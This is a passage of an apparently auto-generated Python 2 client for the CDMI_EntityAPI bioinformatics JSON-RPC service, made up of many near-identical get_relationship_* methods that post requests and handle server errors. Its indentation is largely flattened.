else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsProteinFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsProteinFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Produces(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Produces',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsReagentIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsReagentIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Targets(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Targets',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRealLocationOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRealLocationOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRealLocationIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRealLocationIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsReferencedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsReferencedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_UsesReference(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_UsesReference',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRegulatedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRegulatedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRegulatedSetOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRegulatedSetOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRegulatorFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRegulatorFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRegulator(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRegulator',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRegulatorForRegulon(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRegulatorForRegulon',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
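    # Note: 'ReglonHasRegulator' (sic) below matches the spelling in the
    # 'CDMI_EntityAPI.get_relationship_ReglonHasRegulator' method string it
    # sends; it is kept as-is because the RPC target on the server side
    # uses that spelling.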
def get_relationship_ReglonHasRegulator(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ReglonHasRegulator',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRegulatorySiteFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRegulatorySiteFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRegulatorySite(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRegulatorySite',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRelevantFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRelevantFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRelevantTo(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRelevantTo',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRepresentedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRepresentedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DefinedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DefinedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRoleOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRoleOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRole(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRole',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRowOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRowOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRoleFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRoleFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSequenceOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSequenceOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAsSequence(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAsSequence',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSourceForAssociationDataset(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSourceForAssociationDataset',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AssociationDatasetSourcedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AssociationDatasetSourcedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSubInstanceOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSubInstanceOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Validates(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Validates',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSummarizedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSummarizedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Summarizes(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Summarizes',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSuperclassOf(self, ids, from_fields, rel_fields, to_fields):
